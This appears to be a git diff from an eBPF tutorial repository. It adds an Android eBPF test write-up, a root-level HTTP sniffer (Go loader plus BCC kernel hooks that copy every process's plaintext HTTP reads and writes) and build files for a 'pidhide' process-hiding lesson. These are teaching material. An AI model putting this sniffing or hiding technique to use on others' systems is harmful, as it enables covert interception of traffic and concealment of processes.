    有部分 eBPF 程序可以成功在 Android 上运行,但也会有部分应用因为种种原因无法成功被执行。

    +

    成功案例

    +

    bootstrap

    +

    运行输出如下:

    +
    TIME     PID     PPID    EXIT_CODE  DURATION_NS  COMM    FILENAME  EXIT_EVENT
    +09:09:19  10217  479     0          0            sh      /system/bin/sh 0
    +09:09:19  10217  479     0          0            ps      /system/bin/ps 0
    +09:09:19  10217  479     0          54352100     ps                1
    +09:09:21  10219  479     0          0            sh      /system/bin/sh 0
    +09:09:21  10219  479     0          0            ps      /system/bin/ps 0
    +09:09:21  10219  479     0          44260900     ps                1
    +
    +

    tcpstates

    +

    开始监测后在 Linux 环境中通过 wget 下载 Web 页面:

    +
    TIME     SADDR   DADDR   SKADDR  TS_US   DELTA_US  PID     OLDSTATE  NEWSTATE  FAMILY  SPORT   DPORT   TASK
    +09:07:46  0x4007000200005000000000000f02000a 0x5000000000000f02000a8bc53f77 18446635827774444352 3315344998 0 10115 7 2 2 0 80 wget
    +09:07:46  0x40020002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315465870 120872 0 2 1 2 55694 80 swapper/0
    +09:07:46  0x40010002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315668799 202929 10115 1 4 2 55694 80 wget
    +09:07:46  0x40040002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315670037 1237 0 4 5 2 55694 80 swapper/0
    +09:07:46  0x40050002000050003d99f8090f02000a 0x50003d99f8090f02000a8bc53f77 18446635827774444352 3315670225 188 0 5 7 2 55694 80 swapper/0
    +09:07:47  0x400200020000bb01565811650f02000a 0xbb01565811650f02000a6aa0d9ac 18446635828348806592 3316433261 0 2546 2 7 2 49970 443 ChromiumNet
    +09:07:47  0x400200020000bb01db794a690f02000a 0xbb01db794a690f02000aea2afb8e 18446635827774427776 3316535591 0 1469 2 7 2 37386 443 ChromiumNet
    +
    +

    开始检测后在 Android Studio 模拟界面打开 Chrome 浏览器并访问百度页面:

    +
    TIME     SADDR   DADDR   SKADDR  TS_US   DELTA_US  PID     OLDSTATE  NEWSTATE  FAMILY  SPORT   DPORT   TASK
    +07:46:58  0x400700020000bb01000000000f02000a 0xbb01000000000f02000aeb6f2270 18446631020066638144 192874641 0 3305 7 2 2 0 443 NetworkService
    +07:46:58  0x40020002d28abb01494b6ebe0f02000a 0xd28abb01494b6ebe0f02000aeb6f2270 18446631020066638144 192921938 47297 3305 2 1 2 53898 443 NetworkService
    +07:46:58  0x400700020000bb01000000000f02000a 0xbb01000000000f02000ae7e7e8b7 18446631020132433920 193111426 0 3305 7 2 2 0 443 NetworkService
    +07:46:58  0x40020002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193124670 13244 3305 2 1 2 46240 443 NetworkService
    +07:46:58  0x40010002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193185397 60727 3305 1 4 2 46240 443 NetworkService
    +07:46:58  0x40040002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186122 724 3305 4 5 2 46240 443 NetworkService
    +07:46:58  0x400500020000bb0179ff85e80f02000a 0xbb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186244 122 3305 5 7 2 46240 443 NetworkService
    +07:46:59  0x40010002d01ebb01d0c52f5c0f02000a 0xd01ebb01d0c52f5c0f02000a51449c27 18446631020103553856 194110884 0 5130 1 8 2 53278 443 ThreadPoolForeg
    +07:46:59  0x400800020000bb01d0c52f5c0f02000a 0xbb01d0c52f5c0f02000a51449c27 18446631020103553856 194121000 10116 3305 8 7 2 53278 443 NetworkService
    +07:46:59  0x400700020000bb01000000000f02000a 0xbb01000000000f02000aeb6f2270 18446631020099513920 194603677 0 3305 7 2 2 0 443 NetworkService
    +07:46:59  0x40020002d28ebb0182dd92990f02000a 0xd28ebb0182dd92990f02000aeb6f2270 18446631020099513920 194649313 45635 12 2 1 2 53902 443 ksoftirqd/0
    +07:47:00  0x400700020000bb01000000000f02000a 0xbb01000000000f02000a26f6e878 18446631020132433920 195193350 0 3305 7 2 2 0 443 NetworkService
    +07:47:00  0x40020002ba32bb01e0e09e3a0f02000a 0xba32bb01e0e09e3a0f02000a26f6e878 18446631020132433920 195206992 13642 0 2 1 2 47666 443 swapper/0
    +07:47:00  0x400700020000bb01000000000f02000a 0xbb01000000000f02000ae7e7e8b7 18446631020132448128 195233125 0 3305 7 2 2 0 443 NetworkService
    +07:47:00  0x40020002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195246569 13444 3305 2 1 2 46248 443 NetworkService
    +07:47:00  0xf02000affff00000000000000000000 0x1aca06cffff00000000000000000000 18446631019225912320 195383897 0 947 7 2 10 0 80 Thread-11
    +07:47:00  0x40010002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195421584 175014 3305 1 4 2 46248 443 NetworkService
    +07:47:00  0x40040002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195422361 777 3305 4 5 2 46248 443 NetworkService
    +07:47:00  0x400500020000bb0136cac8dd0f02000a 0xbb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195422450 88 3305 5 7 2 46248 443 NetworkService
    +07:47:01  0x400700020000bb01000000000f02000a 0xbb01000000000f02000aea2afb8e 18446631020099528128 196321556 0 1315 7 2 2 0 443 ChromiumNet
    +
    +

    一些可能的报错原因

    +

    opensnoop

    +

    例如 opensnoop 工具,可以在 Android 上成功构建,但运行报错:

    +
    libbpf: failed to determine tracepoint 'syscalls/sys_enter_open' perf event ID: No such file or directory
    +libbpf: prog 'tracepoint__syscalls__sys_enter_open': failed to create tracepoint 'syscalls/sys_enter_open' perf event: No such file or directory
    +libbpf: prog 'tracepoint__syscalls__sys_enter_open': failed to auto-attach: -2
    +failed to attach skeleton
    +Error: BpfError("load and attach ebpf program failed")
    +
    +

    后经查看发现内核未开启 CONFIG_FTRACE_SYSCALLS 选项,导致无法使用 syscalls 的 tracepoint。

    +

    总结

    +

    在 Android shell 中查看内核编译选项可以发现 CONFIG_DEBUG_INFO_BTF 默认是打开的,在此基础上 eunomia-bpf 项目提供的 example 已有一些能够成功运行的案例,例如可以监测 exec 族函数的执行和 tcp 连接的状态。

    +

    对于无法运行的一些,原因主要是以下两个方面:

    +
      +
    1. 内核编译选项未支持相关 eBPF 功能;
    2. +
    3. eadb 打包的 Linux 环境较弱,缺乏必须依赖;
    4. +
    +

    目前在 Android 系统中使用 eBPF 工具基本上仍然需要构建完整的 Linux 运行环境,但 Android 内核本身对 eBPF 的支持已较为全面,本次测试证明较高版本的 Android 内核支持 BTF 调试信息和依赖 CO-RE 的 eBPF 程序的运行。

    +

    Android 系统 eBPF 工具的发展需要官方新特性的加入,目前看来通过 Android APP 直接使用 eBPF 工具需要的工作量较大,同时由于 eBPF 工具需要 root 权限,普通 Android 用户的使用会面临较多困难。

    +

    如果希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

    +

    参考

    + + +
    + + +
    +
    + + + +
    + + + + + + + + + + + + + + + + + + +
    + + diff --git a/23-http/index.html b/23-http/index.html new file mode 100644 index 0000000..31c65b4 --- /dev/null +++ b/23-http/index.html @@ -0,0 +1,200 @@ + + + + + + 使用 eBPF 追踪 HTTP 请求或其他七层协议 - bpf-developer-tutorial + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + + + + + + + + + + + +
    + +
    + + + + + + + + +
    +
    +

    http

    +

    TODO

    + +
    + + +
    +
    + + + +
    + + + + + + + + + + + + + + + + + + +
    + + diff --git a/23-http/main.go b/23-http/main.go new file mode 100644 index 0000000..608e85d --- /dev/null +++ b/23-http/main.go @@ -0,0 +1,103 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + + package main + + import ( + "fmt" + bpfwrapper2 "github.com/seek-ret/ebpf-training/workshop1/internal/bpfwrapper" + "github.com/seek-ret/ebpf-training/workshop1/internal/connections" + "github.com/seek-ret/ebpf-training/workshop1/internal/settings" + "io/ioutil" + "log" + "os" + "os/signal" + "os/user" + "runtime/debug" + "syscall" + "time" + + "github.com/iovisor/gobpf/bcc" + ) + + // abortIfNotRoot checks the current user permissions, if the permissions are not elevated, we abort. + func abortIfNotRoot() { + current, err := user.Current() + if err != nil { + log.Panic(err) + } + + if current.Uid != "0" { + log.Panic("sniffer must run under superuser privileges") + } + } + + // recoverFromCrashes is a defer function that caches all panics being thrown from the application. + func recoverFromCrashes() { + if err := recover(); err != nil { + log.Printf("Application crashed: %v\nstack: %s\n", err, string(debug.Stack())) + } + } + + func main() { + if len(os.Args) != 2 { + fmt.Println("Usage: go run main.go ") + os.Exit(1) + } + bpfSourceCodeFile := os.Args[1] + bpfSourceCodeContent, err := ioutil.ReadFile(bpfSourceCodeFile) + if err != nil { + log.Panic(err) + } + + defer recoverFromCrashes() + abortIfNotRoot() + + if err := settings.InitRealTimeOffset(); err != nil { + log.Printf("Failed fixing BPF clock, timings will be offseted: %v", err) + } + + // Catching all termination signals to perform a cleanup when being stopped. + sig := make(chan os.Signal, 1) + signal.Notify(sig, syscall.SIGHUP, syscall.SIGINT, syscall.SIGQUIT, syscall.SIGTERM) + + bpfModule := bcc.NewModule(string(bpfSourceCodeContent), nil) + if bpfModule == nil { + log.Panic("bpf is nil") + } + defer bpfModule.Close() + + connectionFactory := connections.NewFactory(time.Minute) + go func() { + for { + connectionFactory.HandleReadyConnections() + time.Sleep(10 * time.Second) + } + }() + if err := bpfwrapper2.LaunchPerfBufferConsumers(bpfModule, connectionFactory); err != nil { + log.Panic(err) + } + + // Lastly, after everything is ready and configured, attach the kprobes and start capturing traffic. + if err := bpfwrapper2.AttachKprobes(bpfModule); err != nil { + log.Panic(err) + } + log.Println("Sniffer is ready") + <-sig + log.Println("Signaled to terminate") + } diff --git a/23-http/sourcecode.c b/23-http/sourcecode.c new file mode 100644 index 0000000..01bfc92 --- /dev/null +++ b/23-http/sourcecode.c @@ -0,0 +1,497 @@ +// +build ignore + +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + +#include +#include +#include +#include + +// Defines + +#define socklen_t size_t + +// Data buffer message size. BPF can submit at most this amount of data to a perf buffer. +// Kernel size limit is 32KiB. See https://github.com/iovisor/bcc/issues/2519 for more details. +#define MAX_MSG_SIZE 30720 // 30KiB + +// This defines how many chunks a perf_submit can support. +// This applies to messages that are over MAX_MSG_SIZE, +// and effectively makes the maximum message size to be CHUNK_LIMIT*MAX_MSG_SIZE. +#define CHUNK_LIMIT 4 + +enum traffic_direction_t { + kEgress, + kIngress, +}; + +// Structs + +// A struct representing a unique ID that is composed of the pid, the file +// descriptor and the creation time of the struct. +struct conn_id_t { + // Process ID + uint32_t pid; + // The file descriptor to the opened network connection. + int32_t fd; + // Timestamp at the initialization of the struct. + uint64_t tsid; +}; + +// This struct contains information collected when a connection is established, +// via an accept4() syscall. +struct conn_info_t { + // Connection identifier. + struct conn_id_t conn_id; + + // The number of bytes written/read on this connection. + int64_t wr_bytes; + int64_t rd_bytes; + + // A flag indicating we identified the connection as HTTP. + bool is_http; +}; + +// An helper struct that hold the addr argument of the syscall. +struct accept_args_t { + struct sockaddr_in* addr; +}; + +// An helper struct to cache input argument of read/write syscalls between the +// entry hook and the exit hook. +struct data_args_t { + int32_t fd; + const char* buf; +}; + +// An helper struct that hold the input arguments of the close syscall. +struct close_args_t { + int32_t fd; +}; + +// A struct describing the event that we send to the user mode upon a new connection. +struct socket_open_event_t { + // The time of the event. + uint64_t timestamp_ns; + // A unique ID for the connection. + struct conn_id_t conn_id; + // The address of the client. + struct sockaddr_in addr; +}; + +// Struct describing the close event being sent to the user mode. +struct socket_close_event_t { + // Timestamp of the close syscall + uint64_t timestamp_ns; + // The unique ID of the connection + struct conn_id_t conn_id; + // Total number of bytes written on that connection + int64_t wr_bytes; + // Total number of bytes read on that connection + int64_t rd_bytes; +}; + +struct socket_data_event_t { + // We split attributes into a separate struct, because BPF gets upset if you do lots of + // size arithmetic. This makes it so that it's attributes followed by message. + struct attr_t { + // The timestamp when syscall completed (return probe was triggered). + uint64_t timestamp_ns; + + // Connection identifier (PID, FD, etc.). + struct conn_id_t conn_id; + + // The type of the actual data that the msg field encodes, which is used by the caller + // to determine how to interpret the data. + enum traffic_direction_t direction; + + // The size of the original message. We use this to truncate msg field to minimize the amount + // of data being transferred. + uint32_t msg_size; + + // A 0-based position number for this event on the connection, in terms of byte position. + // The position is for the first byte of this message. + uint64_t pos; + } attr; + char msg[MAX_MSG_SIZE]; +}; + +// Maps + +// A map of the active connections. The name of the map is conn_info_map +// the key is of type uint64_t, the value is of type struct conn_info_t, +// and the map won't be bigger than 128KB. +BPF_HASH(conn_info_map, uint64_t, struct conn_info_t, 131072); +// An helper map that will help us cache the input arguments of the accept syscall +// between the entry hook and the return hook. +BPF_HASH(active_accept_args_map, uint64_t, struct accept_args_t); +// Perf buffer to send to the user-mode the data events. +BPF_PERF_OUTPUT(socket_data_events); +// A perf buffer that allows us send events from kernel to user mode. +// This perf buffer is dedicated for special type of events - open events. +BPF_PERF_OUTPUT(socket_open_events); +// Perf buffer to send to the user-mode the close events. +BPF_PERF_OUTPUT(socket_close_events); +BPF_PERCPU_ARRAY(socket_data_event_buffer_heap, struct socket_data_event_t, 1); +BPF_HASH(active_write_args_map, uint64_t, struct data_args_t); +// Helper map to store read syscall arguments between entry and exit hooks. +BPF_HASH(active_read_args_map, uint64_t, struct data_args_t); +// An helper map to store close syscall arguments between entry and exit syscalls. +BPF_HASH(active_close_args_map, uint64_t, struct close_args_t); + +// Helper functions + +// Generates a unique identifier using a tgid (Thread Global ID) and a fd (File Descriptor). +static __inline uint64_t gen_tgid_fd(uint32_t tgid, int fd) { + return ((uint64_t)tgid << 32) | (uint32_t)fd; +} + +// An helper function that checks if the syscall finished successfully and if it did +// saves the new connection in a dedicated map of connections +static __inline void process_syscall_accept(struct pt_regs* ctx, uint64_t id, const struct accept_args_t* args) { + // Extracting the return code, and checking if it represent a failure, + // if it does, we abort the as we have nothing to do. + int ret_fd = PT_REGS_RC(ctx); + if (ret_fd <= 0) { + return; + } + + struct conn_info_t conn_info = {}; + uint32_t pid = id >> 32; + conn_info.conn_id.pid = pid; + conn_info.conn_id.fd = ret_fd; + conn_info.conn_id.tsid = bpf_ktime_get_ns(); + + uint64_t pid_fd = ((uint64_t)pid << 32) | (uint32_t)ret_fd; + // Saving the connection info in a global map, so in the other syscalls + // (read, write and close) we will be able to know that we have seen + // the connection + conn_info_map.update(&pid_fd, &conn_info); + + // Sending an open event to the user mode, to let the user mode know that we + // have identified a new connection. + struct socket_open_event_t open_event = {}; + open_event.timestamp_ns = bpf_ktime_get_ns(); + open_event.conn_id = conn_info.conn_id; + bpf_probe_read(&open_event.addr, sizeof(open_event.addr), args->addr); + + socket_open_events.perf_submit(ctx, &open_event, sizeof(struct socket_open_event_t)); +} + +static inline __attribute__((__always_inline__)) void process_syscall_close(struct pt_regs* ctx, uint64_t id, + const struct close_args_t* close_args) { + int ret_val = PT_REGS_RC(ctx); + if (ret_val < 0) { + return; + } + + uint32_t tgid = id >> 32; + uint64_t tgid_fd = gen_tgid_fd(tgid, close_args->fd); + struct conn_info_t* conn_info = conn_info_map.lookup(&tgid_fd); + if (conn_info == NULL) { + // The FD being closed does not represent an IPv4 socket FD. + return; + } + + // Send to the user mode an event indicating the connection was closed. + struct socket_close_event_t close_event = {}; + close_event.timestamp_ns = bpf_ktime_get_ns(); + close_event.conn_id = conn_info->conn_id; + close_event.rd_bytes = conn_info->rd_bytes; + close_event.wr_bytes = conn_info->wr_bytes; + + socket_close_events.perf_submit(ctx, &close_event, sizeof(struct socket_close_event_t)); + + // Remove the connection from the mapping. + conn_info_map.delete(&tgid_fd); +} + +static inline __attribute__((__always_inline__)) bool is_http_connection(struct conn_info_t* conn_info, const char* buf, size_t count) { + // If the connection was already identified as HTTP connection, no need to re-check it. + if (conn_info->is_http) { + return true; + } + + // The minimum length of http request or response. + if (count < 16) { + return false; + } + + bool res = false; + if (buf[0] == 'H' && buf[1] == 'T' && buf[2] == 'T' && buf[3] == 'P') { + res = true; + } + if (buf[0] == 'G' && buf[1] == 'E' && buf[2] == 'T') { + res = true; + } + if (buf[0] == 'P' && buf[1] == 'O' && buf[2] == 'S' && buf[3] == 'T') { + res = true; + } + + if (res) { + conn_info->is_http = true; + } + + return res; +} + +static __inline void perf_submit_buf(struct pt_regs* ctx, const enum traffic_direction_t direction, + const char* buf, size_t buf_size, size_t offset, + struct conn_info_t* conn_info, + struct socket_data_event_t* event) { + switch (direction) { + case kEgress: + event->attr.pos = conn_info->wr_bytes + offset; + break; + case kIngress: + event->attr.pos = conn_info->rd_bytes + offset; + break; + } + + // Note that buf_size_minus_1 will be positive due to the if-statement above. + size_t buf_size_minus_1 = buf_size - 1; + + // Clang is too smart for us, and tries to remove some of the obvious hints we are leaving for the + // BPF verifier. So we add this NOP volatile statement, so clang can't optimize away some of our + // if-statements below. + // By telling clang that buf_size_minus_1 is both an input and output to some black box assembly + // code, clang has to discard any assumptions on what values this variable can take. + asm volatile("" : "+r"(buf_size_minus_1) :); + + buf_size = buf_size_minus_1 + 1; + + // 4.14 kernels reject bpf_probe_read with size that they may think is zero. + // Without the if statement, it somehow can't reason that the bpf_probe_read is non-zero. + size_t amount_copied = 0; + if (buf_size_minus_1 < MAX_MSG_SIZE) { + bpf_probe_read(&event->msg, buf_size, buf); + amount_copied = buf_size; + } else { + bpf_probe_read(&event->msg, MAX_MSG_SIZE, buf); + amount_copied = MAX_MSG_SIZE; + } + + // If-statement is redundant, but is required to keep the 4.14 verifier happy. + if (amount_copied > 0) { + event->attr.msg_size = amount_copied; + socket_data_events.perf_submit(ctx, event, sizeof(event->attr) + amount_copied); + } +} + +static __inline void perf_submit_wrapper(struct pt_regs* ctx, + const enum traffic_direction_t direction, const char* buf, + const size_t buf_size, struct conn_info_t* conn_info, + struct socket_data_event_t* event) { + int bytes_sent = 0; + unsigned int i; +#pragma unroll + for (i = 0; i < CHUNK_LIMIT; ++i) { + const int bytes_remaining = buf_size - bytes_sent; + const size_t current_size = (bytes_remaining > MAX_MSG_SIZE && (i != CHUNK_LIMIT - 1)) ? MAX_MSG_SIZE : bytes_remaining; + perf_submit_buf(ctx, direction, buf + bytes_sent, current_size, bytes_sent, conn_info, event); + bytes_sent += current_size; + if (buf_size == bytes_sent) { + return; + } + } +} + +static inline __attribute__((__always_inline__)) void process_data(struct pt_regs* ctx, uint64_t id, + enum traffic_direction_t direction, + const struct data_args_t* args, ssize_t bytes_count) { + // Always check access to pointer before accessing them. + if (args->buf == NULL) { + return; + } + + // For read and write syscall, the return code is the number of bytes written or read, so zero means nothing + // was written or read, and negative means that the syscall failed. Anyhow, we have nothing to do with that syscall. + if (bytes_count <= 0) { + return; + } + + uint32_t pid = id >> 32; + uint64_t pid_fd = ((uint64_t)pid << 32) | (uint32_t)args->fd; + struct conn_info_t* conn_info = conn_info_map.lookup(&pid_fd); + if (conn_info == NULL) { + // The FD being read/written does not represent an IPv4 socket FD. + return; + } + + // Check if the connection is already HTTP, or check if that's a new connection, check protocol and return true if that's HTTP. + if (is_http_connection(conn_info, args->buf, bytes_count)) { + // allocate new event. + uint32_t kZero = 0; + struct socket_data_event_t* event = socket_data_event_buffer_heap.lookup(&kZero); + if (event == NULL) { + return; + } + + // Fill the metadata of the data event. + event->attr.timestamp_ns = bpf_ktime_get_ns(); + event->attr.direction = direction; + event->attr.conn_id = conn_info->conn_id; + + perf_submit_wrapper(ctx, direction, args->buf, bytes_count, conn_info, event); + } + + // Update the conn_info total written/read bytes. + switch (direction) { + case kEgress: + conn_info->wr_bytes += bytes_count; + break; + case kIngress: + conn_info->rd_bytes += bytes_count; + break; + } +} + +// Hooks +int syscall__probe_entry_accept(struct pt_regs* ctx, int sockfd, struct sockaddr* addr, socklen_t* addrlen) { + uint64_t id = bpf_get_current_pid_tgid(); + + // Keep the addr in a map to use during the exit method. + struct accept_args_t accept_args = {}; + accept_args.addr = (struct sockaddr_in *)addr; + active_accept_args_map.update(&id, &accept_args); + + return 0; +} + +int syscall__probe_ret_accept(struct pt_regs* ctx) { + uint64_t id = bpf_get_current_pid_tgid(); + + // Pulling the addr from the map. + struct accept_args_t* accept_args = active_accept_args_map.lookup(&id); + if (accept_args != NULL) { + process_syscall_accept(ctx, id, accept_args); + } + + active_accept_args_map.delete(&id); + return 0; +} + + +// Hooking the entry of accept4 +// the signature of the syscall is int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen); +int syscall__probe_entry_accept4(struct pt_regs* ctx, int sockfd, struct sockaddr* addr, socklen_t* addrlen) { + // Getting a unique ID for the relevant thread in the relevant pid. + // That way we can link different calls from the same thread. + uint64_t id = bpf_get_current_pid_tgid(); + + // Keep the addr in a map to use during the accpet4 exit hook. + struct accept_args_t accept_args = {}; + accept_args.addr = (struct sockaddr_in *)addr; + active_accept_args_map.update(&id, &accept_args); + + return 0; +} + +// Hooking the exit of accept4 +int syscall__probe_ret_accept4(struct pt_regs* ctx) { + uint64_t id = bpf_get_current_pid_tgid(); + + // Pulling the addr from the map. + struct accept_args_t* accept_args = active_accept_args_map.lookup(&id); + // If the id exist in the map, we will get a non empty pointer that holds + // the input address argument from the entry of the syscall. + if (accept_args != NULL) { + process_syscall_accept(ctx, id, accept_args); + } + + // Anyway, in the end clean the map. + active_accept_args_map.delete(&id); + return 0; +} + +// original signature: ssize_t write(int fd, const void *buf, size_t count); +int syscall__probe_entry_write(struct pt_regs* ctx, int fd, char* buf, size_t count) { + uint64_t id = bpf_get_current_pid_tgid(); + + struct data_args_t write_args = {}; + write_args.fd = fd; + write_args.buf = buf; + active_write_args_map.update(&id, &write_args); + + return 0; +} + +int syscall__probe_ret_write(struct pt_regs* ctx) { + uint64_t id = bpf_get_current_pid_tgid(); + ssize_t bytes_count = PT_REGS_RC(ctx); // Also stands for return code. + + // Unstash arguments, and process syscall. + struct data_args_t* write_args = active_write_args_map.lookup(&id); + if (write_args != NULL) { + process_data(ctx, id, kEgress, write_args, bytes_count); + } + + active_write_args_map.delete(&id); + return 0; +} + +// original signature: ssize_t read(int fd, void *buf, size_t count); +int syscall__probe_entry_read(struct pt_regs* ctx, int fd, char* buf, size_t count) { + uint64_t id = bpf_get_current_pid_tgid(); + + // Stash arguments. + struct data_args_t read_args = {}; + read_args.fd = fd; + read_args.buf = buf; + active_read_args_map.update(&id, &read_args); + + return 0; +} + +int syscall__probe_ret_read(struct pt_regs* ctx) { + uint64_t id = bpf_get_current_pid_tgid(); + + // The return code the syscall is the number of bytes read as well. + ssize_t bytes_count = PT_REGS_RC(ctx); + struct data_args_t* read_args = active_read_args_map.lookup(&id); + if (read_args != NULL) { + // kIngress is an enum value that let's the process_data function + // to know whether the input buffer is incoming or outgoing. + process_data(ctx, id, kIngress, read_args, bytes_count); + } + + active_read_args_map.delete(&id); + return 0; +} + +// original signature: int close(int fd) +int syscall__probe_entry_close(struct pt_regs* ctx, int fd) { + uint64_t id = bpf_get_current_pid_tgid(); + struct close_args_t close_args; + close_args.fd = fd; + active_close_args_map.update(&id, &close_args); + + return 0; +} + +int syscall__probe_ret_close(struct pt_regs* ctx) { + uint64_t id = bpf_get_current_pid_tgid(); + const struct close_args_t* close_args = active_close_args_map.lookup(&id); + if (close_args != NULL) { + process_syscall_close(ctx, id, close_args); + } + + active_close_args_map.delete(&id); + return 0; +} diff --git a/24-hide/.gitignore b/24-hide/.gitignore new file mode 100644 index 0000000..1841117 --- /dev/null +++ b/24-hide/.gitignore @@ -0,0 +1,10 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +bootstrap +pidhide + diff --git a/24-hide/LICENSE b/24-hide/LICENSE new file mode 100644 index 0000000..47fc3a4 --- /dev/null +++ b/24-hide/LICENSE @@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2020, Andrii Nakryiko +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/24-hide/Makefile b/24-hide/Makefile new file mode 100644 index 0000000..7a64112 --- /dev/null +++ b/24-hide/Makefile @@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = pidhide # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. +CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + 